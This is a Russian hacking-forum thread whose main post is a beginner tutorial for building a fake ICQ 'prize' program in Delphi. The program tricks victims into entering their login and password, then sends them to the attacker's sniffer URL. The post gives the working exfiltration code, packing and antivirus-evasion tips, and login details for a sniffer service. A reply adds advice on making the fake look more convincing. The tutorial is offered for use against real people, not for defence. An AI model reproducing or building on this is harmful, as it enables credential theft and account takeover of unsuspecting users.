Сказ о том как фейк-программу на Delphi написать (со скорой депешей на сниффер)


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Скажу сразу,зубрам кодинга не читать,дабы не впасть в уныние.Статья исключительно для новичков.
Всем привет!Решил поведать вам одну заезженную в "интернетах" легенду,но в отличии от других повествований,после прочтения этой,я думаю,вы сможете накалякать свою первую фейк-программу.Даже без знаний программирования на Delphi.Хотя,как мне кажется,сейчас рождаются дети уже со знанием того,где находится Борляндия и кто такой Великий и Ужасный Делфи.Чтобы всё у нас получилось,я опишу все действия пошагово.Иные кодеры (к которым себя+упаси Бог+я не причисляю) начинают писать заумные статьи,интересные может быть только им самим или подобным индивидуумам.Мы же в пять сек,накатаем рабочую прогу совершенно них*я не понимая в прог-ии. И в отличии от ваяния в ДевелСтудио,наше творение в Делфи,не будет так ненавистно этим сучкам с VT...вообщем как по волшебству.
1.Качаем Делфи (Delphi7_Lite_Full_Edition её нам вполне хватит).Я брал с
.Внимательно просмотрите все скрины установки.На моей "виндовз 8.1" делфи работает безупречно и если у вас,что-то не работает...хм,ладно без оскорблений.Единственное,что могу посоветовать-отключайте префикс-мастер после установки (хотя на ваше усмотрение),чтобы названия ваших компонентов не превращались из "Button" в "btn".Это очень неудобно при изучении чужих исходников.Как отключить:вкладка "CnPack"-"Настройки"-"Настройка мастеров".
2.При открытии делфи,мы уже имеем готовую основу для создания будущей программы,то есть имеем форму.Для начала выберем место сохранения будущего проекта:в левом верхнем углу жмём на вкладку "File" и выпадающем списке выбираем "Save all" (выбираем папку для сохранения проекта).
Снимок экрана (13).png - Paint.png.png

Теперь подберём графический интерфейс для нашей проги.Тут уж всё зависит от вашей фантазии.Например,давайте нарисуем фейк на тему " "!смотрим видос!,просто вспомнился почему-то этот ролик:).Ищем подобающую картинку (надписи можете сделать предварительно)...
d457742d2ef8.jpg


Чтобы добавить её на форму,находим вкладку "Additional",а на ней пункт "Image".Кликаем по "Image",а затем по форме.
Delphi 7 - Project1.png

На форме появиться "окно",размер которого можно регулировать курсором.В него-то мы и вставим наш картину.Чтобы это сделать переместимся на "Инспектор объектов" (Object inspector) в левом нижнем углу нашей Делфи,а именно пункт "Picture" (жмакаем по точкам).
Object Inspector.png

Появиться окно "PictureEditor",вот через него мы и переместим картинку на фейс нашей проги.Жмём "Load" и выбираем нужное изображение (откорректировав его предварительно в каком-нибудь редакторе,добавив нужные надписи,значки и т.п).Подтверждаем загрузку-"ок".Редактируем положение изображения на форме.
Form1.png

3.Теперь мы должны добавить нужные компоненты на форму.Для работы с интернетом нам нужен компонент "idHTTP" (позволяет выполнять GET и POST запросы) из вкладки "Indy Clients".Кликаем по компоненту-кликаем по форме для добавления.
Unit1.pas.png

4.Добавим окошки куда пользователь-жертва будет вводить данные для авторизации в своей "аське".Для того,чтобы он мог распознать,что и куда вводить,разместим надписи "Логин" и "Пароль" (хотя это можно было сделать и в графическом редакторе прямо на изображении).Чтобы написать эти два слова,нам потребуется компонент "Label" на вкладке "Standard".Размещаем "лабели" на форме.
Unit2.pas.png


Чтобы редактировать надпись,снова обратимся к "инспектору объектов".Выбираем пункт "Caption" и изменяем надпись.Label1 будет у нас "Логин",а Label2-"Пароль".
Object Inspector2.png

Вот теперь добавим окошки для ввода.Делаем это при помощи компонента "Edit" на вкладке "Standard".Ставим напротив "логина"-"edit1",а напротив "пароля"-edit2".
Unit3.pas.png



Form2.png


Блин!!!Не лезет в один пост!!!И всё из-за ограничений по загрузке вложений.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Чтобы убрать из окошек эти "буржуйские" надписи идём в "инспектор объектов"-пункт "Text" (проделываем это для каждого окошка).Кстати,чтобы в инспекторе объектов отображались параметры для нужного нам компонента,надо просто по нему кликнуть (в данном случае по окошку edit1 и edit2)
Object Inspector.png


5.И наконец добавляем мой любимый компонент-кнопку.Располагается он на вкладке "Standard" и называется "Button".

Form23.png

Расположение изображения на форме программы выбрано у меня неудачно (так как пишу этот текст и делаю прогу в режиме "онлайн"),поэтому кнопка будет не очень красиво смотреться на ней.Изменяем надпись "Button1" на кнопке,на что-нибудь своё (через пункт "Caption" в инспекторе объектов).Теперь осталось только добавить наш код.
6.Код будет исполняться (то есть отправлять введённые в edit1 и edit2 данные на сниффер) при нажатии на кнопку.Чтобы разместить его-дважды кликаем по кнопке на форме и попадаем в "Редактор кода".Видим два слова выделенных красным цветом:begin и end.
Unitа.pas.png

Вот между ними и вставляем следующий код:
Код:
if (Edit1.Text='') or (Edit2.Text='') then
 
Application.MessageBox('Необходимо указать логин и пароль','Король аськи')
 
else begin
 
pass:=Edit2.Text; login:=Edit1.Text;
 
sleep(3000);
 
IdHTTP1.Get('http://ссылка на ваш сниффер?Agent[Login:'+login+';Password:'+pass+']');
 
ShowMessage('Вы стали королём аськи!Поздравляем!');
 
end;

И не забываем объявить локальную переменную,то есть над begin пишем
Код:
var
 
pass,login:string;

Unit7pas.png


в заключении кода пишем end.
Небольшое дополнение по строчке:IdHTTP1.Get(' на ваш сниффер.В ссылке на наш сниффер пишем ссылку на картинку 1x1px,которая должна иметься на вашем сниффере.Например на или персональном (в этой теме немного подробней о персональном сниффере).
7.Теперь по мелочи.Сделаем нашу форму фиксированной,это значит ,что после запуска нельзя будет изменить её размер (небольшие прожки выглядят приятнее,да и косяков с отображением не будет).В уже известном нам "инспекторе объектов" выбираем 'Form11' и ниже в параметре "BorderStyle" выбираем значение "bsDialog".
Object ывсвInspector.png

Теперь размер у программы фиксированный и убраны лишние элементы управления (свернуть и полноэкранный режим).
Меняем название нашей проги с "Form1",например,на "Король аськи",делается это в "Caption" всё в том же инспекторе обьектов.Да и вообще можете поэкспериментировать с этими параметрами.Ну и в заключении,поменяем иконку.Project - Options - Application там загружаем новую иконку.
Project Options for Project1.exe.png

8.Финал.Компилируем программу.Вкладка "Project" и в выпавшем списке выбираем "Bulid all Projects".Cобранная программа появиться в папке,которую мы выбрали изначально для сохранения.Вес программы увеличился вдвое из-за тяжёлой иконки.Можете ужать прогу с помощью просто перетащив свою программку на файл upx.exe.Вот и всё,мы написали простейший программный фейк.Правда ,не понравилась наша работа.
Данные для доступа к снифферу HPC
[HIDE=5]https://hpc.name/sniffer/
Логин:rusphere
Пасс:test[/HIDE]
Пример работы "Короля аськи"
1.gif
 

Вложения

  • Король icq.rar
    594.3 КБ · Просмотры: 15
  • Source.rar
    687.1 КБ · Просмотры: 20

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Можно ещё модифицировать наш фейк, там где ввод пароля:

В свойствах Edit найди параметр PasswordChar по умолчанию там #0 измени на *!

Тогда пароль будет отображаться звёздочками, красивее и правдоподобнее типо !Dmeh-Smeh-Smeh!!!
 

Lyudmila

Уважаемый пользователь
Форумчанин
Регистрация
12.03.2014
Сообщения
150
Репутация
205
so happy У меня есть несбыточная мечта, - научиться программировать на Delphi и Си++
Почему несбыточная? Как объять сток много всего, счас вот парюсь с PHP, JAVASCRIPT, MySql и прочим инструментарием... Статья понравилась, - ОК! Сиб, даже мне понятно!
 
Верх Низ